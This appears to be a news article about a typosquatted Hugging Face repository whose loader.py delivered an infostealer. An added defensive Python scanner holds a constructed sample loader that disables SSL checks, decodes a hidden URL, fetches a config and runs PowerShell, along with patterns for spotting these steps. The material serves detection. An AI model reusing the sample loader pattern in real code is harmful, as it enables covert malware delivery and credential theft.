Cybercriminals created a bogus OpenAI repository on Hugging Face, disguising malware as a privacy filter model and reaching over 244,000 downloads before platform administrators removed it.
Malicious Typosquatting Attack
Security researchers at HiddenLayer identified the fraudulent repository, named Open-OSS/privacy-filter, as a close imitation of an official OpenAI release. Its model card mirrored the legitimate version almost word-for-word, but the included loader.py file triggered the infostealer payload.
How the Malware Operates
The malware begins by disabling SSL verification, decoding a base64-encoded URL, and retrieving a JSON file containing a PowerShell command. This downloads a batch script that elevates privileges, deploys the 'sefirah' infostealer, adds it to the Microsoft Defender exclusions, and executes it.
The sefirah payload targets browsers for saved credentials, Discord tokens, local databases, and master keys. It also steals cryptocurrency wallet details, browser extensions, SSH/FTP/VPN logins, sensitive local files, screenshots, and system information.
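A detection-side illustration of the loader behaviour described above, added here as an example and not code from the article or from HiddenLayer: it scans a constructed loader file for the same indicators (SSL verification disabled, a base64-decoded URL, a PowerShell hand-off, a Defender exclusion) and decodes any base64 literal it finds so the hidden URL is visible to the reviewer. The sample loader text, the benign comparison file and the example.invalid URL are all constructed for this example.

```python
import base64
import re

# Constructed sample of a model-repo loader, modelled on the behaviours the article
# attributes to loader.py. It is text to be scanned only and is never executed here.
SAMPLE_LOADER = '''\
import ssl, base64, json, subprocess, urllib.request
ssl._create_default_https_context = ssl._create_unverified_context
url = base64.b64decode("aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvY29uZmlnLmpzb24=").decode()
cfg = json.loads(urllib.request.urlopen(url).read())
subprocess.run(["powershell", "-EncodedCommand", cfg["cmd"]])
'''

# Constructed benign loader for comparison: an ordinary model load, nothing else.
BENIGN_LOADER = '''\
from transformers import AutoModelForSequenceClassification
model = AutoModelForSequenceClassification.from_pretrained(".")
'''

# One pattern per behaviour the article describes.
INDICATORS = {
    "ssl_verification_disabled": re.compile(r"_create_unverified_context|verify\s*=\s*False"),
    "base64_decode": re.compile(r"\bb64decode\s*\("),
    "powershell_handoff": re.compile(r"powershell(\.exe)?", re.IGNORECASE),
    "defender_exclusion": re.compile(r"Add-MpPreference|ExclusionPath", re.IGNORECASE),
}
B64_LITERAL = re.compile(r"""b64decode\(\s*["']([A-Za-z0-9+/=]{8,})["']""")


def scan_loader(source: str) -> dict:
    """Return {indicator: [line numbers]} plus the decoded form of any base64 literal."""
    hits = {name: [] for name in INDICATORS}
    decoded = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pattern in INDICATORS.items():
            if pattern.search(line):
                hits[name].append(lineno)
        for literal in B64_LITERAL.findall(line):
            try:
                decoded.append(base64.b64decode(literal, validate=True).decode("utf-8", "replace"))
            except ValueError:
                pass  # not valid base64; the b64decode call itself is already recorded above
    hits["decoded_literals"] = decoded
    return hits


def is_suspicious(report: dict) -> bool:
    """Flag a loader when two or more distinct behaviours co-occur in the same file."""
    return sum(1 for name in INDICATORS if report[name]) >= 2
```

Running the scanner over a model repository's loader before executing it is cheap; a Python file shipped with model weights has no reason to touch TLS settings or PowerShell.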
Scale and Response
The fake repository amassed 244,000 downloads in days and briefly claimed the top spot in Hugging Face rankings. Analysis indicates the figures may have been inflated, with 667 likes coming from automated accounts. HiddenLayer traced these accounts to additional malicious repositories sharing the same infrastructure, all now removed from the platform.
While not every download resulted in an infection, the incident highlights the risks in AI model repositories and the need for vigilant verification.